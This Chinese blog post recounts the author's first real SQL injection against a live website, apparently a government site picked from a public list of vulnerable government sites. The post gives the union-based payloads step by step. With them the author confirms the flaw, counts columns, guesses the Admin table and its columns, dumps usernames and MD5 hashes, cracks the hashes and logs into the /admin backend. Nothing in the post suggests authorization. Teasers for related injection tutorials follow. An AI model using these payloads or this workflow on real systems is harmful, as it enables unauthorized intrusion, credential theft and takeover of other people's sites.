记sql注入第一次实战

最新推荐文章于 2024-04-11 12:55:43 发布
最新推荐文章于 2024-04-11 12:55:43 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: SQL注入 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/strwolf/article/details/51023259
版权

0x00. 光看书想睡觉,所以打算还是找个实际的环境来练练手。

0x01. 寻找目标:去wooyun看了666个政府网站的注入点,所以很受启发,随便用一个点google一下,再在结果中随便找了一个

0x02. 确认是否存在SQL注入漏洞:参数本身是id=7,乍一看是数值参数,直接?id=7 and 1=2页面正常返回,猜测参数被单引号包围,尝试用单引号去闭合?id=7' and 1=2--%20,查询后页面部分空白没有返回,说明查询结果为空,成功注射sql语句,存在漏洞

0x03. 猜字段数:?id=7' union select 1--%20、?id=7' union select 1,2--%20、?id=7' union select 1,2,3--%20 ... 依次增加一个字段直到能正常union在一起,页面上反应出来就是能够正常显示,获得了该get请求后台select的字段数

0x04. 猜管理员的表名:猜测叫Admin,?id=7' and (select count(*) from Admin)>0--%20,页面正常返回

0x05. 猜Admin表的字段名:猜测用户名为username,?id=7' and (select count(username) from Admin)>0--%20,页面正常返回;猜测密码为password,?id=7' and (select count(password) from Admin)>0--%20,页面正常返回

0x06. 输出管理员账号和密码:通过反复查询打乱结果集数据不难发现,后端应该是拿查询结果返回的第一条记录第二个字段的值作为数据组装成html,加载到页面的某一固定区域中(DIV),于是构造查询,?id=' union select 1,count(*) from Admin--%20,获得Admin中的用户条数为2,再构造查询,?id=' union select 1,username from Admin--%20 和 ?id=' union select 1,username from Admin limit 1,1--%20获得第一个账户名和第二个账户名,最后构造查询?id=' union select 1,password from Admin--%20 和 ?id=' union select 1,password from Admin limit 1,1--%20获得第一个密码和第二个密码,我实验发现,这里按自然排序分别查username和password,是能对应上的,也就是说第一个username就对应第一个密码,以此类推

0x07. 破解密码密文:目测为md5加密,随便搜个在线md5破解,成功破解

0x08. 找寻网站后台:这里我又是猜的/admin,成功找到,输入账号和密码成功登陆

strwolf
关注
专栏目录
SQL注入实战
qq_44915227的博客
04-17 1852
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1571
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),录着与table_schema这个字段对应的数据库中对应的表名。
SQL注入实战
hxhabcd123的博客
08-28 2512
本文录各种SQL注入类型的实操过程
WEB新手之sql注入
weixin_33901843的博客
03-22 108
  继续写题。   这题看上去是一道sql注入题。F12查看后台代码。   可以看到后台有两个变量,分别是uname以及passwd。然后接下来读一下后台的代码,这里的意思是,如果用户输入的密码经过md5加密后,和通过select语句选出来的password相等,则输出“login success”,否则输出“login fail”。利用这里md5()条件语句,我们可以对后台的sql语...
SQL注入实战演练
derman的博客
10-16 252
1.如何判断此处是否有SQL注入漏洞? 方法一:输入-1或+1,看是否能够回显上一个或者下一个页面(判断是否有回显)。 方法二:'或" ,看是否显示数据库错误信息,并根据回显内容可以判断是字符型数据还是数字型。 方法三:and 1=1 或and 1=2 ,看回显的页面是否不同(布尔类型的状态)。 方法四:and sleep(5) ,判断页面的返回时间。 方法五:\ ,判断转义 2.实例 2.1 联合查询 2.1 报错注入 2.3 布尔盲注 2.4 延时注入 2.5 堆...
sql注入实战1
GUN_C的博客
09-13 362
解密flag 一.测试阶段 进上述网站,测试检查问题方向 ①数字型注入 测试当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 ②字符型注入 加入单引号之后看是否会报错,如果会报错的话进行下一步报错型注入 二.利用sqlmap查找SQL注入漏洞 1.安装sqlmap 下载sqlmap相关安装包后解压 将sqlmap复制到python安装目录下,在cmd中输入命令 sqlmap.py -h 安装 2.检查注入 ①GET注入 连接 查看所有数据库 (注意是要破解哪一个,也可一个一个
sql注入学习第一篇---基础
qq_36874480的博客
07-03 261
SQL注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合, 通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致; 后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 基于此,SQL注入的产生原因通常表现在以下几方面: ①不当的类型处理; ②不安全的数据库配
一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5016
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
一次api接口SQL注入实战
m0_65247093的博客
04-30 3340
目录 0x01 思路:google hacking语法asmx?wsdl 0x02 发现两个接口 并且能够异地调用 0x03 抓包repeat判断 0x04 暴库 指导 某迪导师 0x01 思路:google hacking语法asmx?wsdl 点击url:domain/WebServices/InboxWS.asmx 0x02 发现两个接口 并且能够异地调用 火狐中抓包 测试 0x03 抓包repeat判断 四个参数加 ' 报nynax错误 由此推断可能存..
实战篇】第20篇:SQL二次编码注入漏洞实例(附tamper脚本)1
08-03
如果我们传入双重url编码的字符串,将绕过非法字符检测,然后经urldecode解码,带入数据库中执行,导致SQL注入漏洞存在。 三、漏洞利用 1. 双重URLencode编码绕过:通过编写tamper脚本,可以绕过URLencode双重编码...
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
SQL注入攻击实操
12-24
对某个网站进行SQL注入攻击 获取账号密码
sql手工注入实战
mulincong的博客
05-30 2304
sql手工注入封神台靶场
实战系列 1】一次从SQL注入到3389远程登录Windows桌面并上线CobaltStrike
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-07 3490
大家好,欢迎来到我的实战系列专栏,这里的文章没有水分,全是实战干货,这是实战系列的第一篇,是测试一个系统发现的sql注入漏洞,最后上线cs的也是一个比较老的windws系统。
一篇文章教你玩转,入门级 SQL 注入实战
朱雀随云记的博客
04-11 779
uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。
给大家发一个SQL注入实战教程吧
Y7967
12-24 3945
(大家可以用GOOGLE搜索,www.jinshouzhi.org有得下)这篇文章是去年10月份发的,我今年3月份才发现,这么长时间以来我的网站www.shbbs.net一直被当作教程攻击,呵呵,晕死。直到有一个好心网友提醒我我才做了一些处理。大家不要再按教程上直接使用攻击我的网站www.shbbs.net了,呵呵我已经打了预防针了:)找别人的去演习吧:)以下是文章部分,还有动画教程,
SQL注入实战新手教程
weixin_30755393的博客
11-08 174
本文章仅用于网络安全交流学习,严禁用于非法用途,否则后果自负 一.如何批量找SQL注入(工具+资源都打包):http://www.liuwx.cn/post-149.html 1.SQL注入点搜索关键字集合:http://blog.sina.com.cn/s/blog_6910b7580101ci62.html 谷歌SQL关键字:https://www.exehack.net/779...
SQL注入攻击深度解析:实战案例与防范
通常,测试SQL注入的第一步是输入包含单引号的测试数据,以查看系统是否对输入进行了过滤。在这个案例中,当输入带单引号的邮箱地址后,服务器返回了500错误,表明用户输入已直接用于构建SQL查询,未经过有效过滤,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值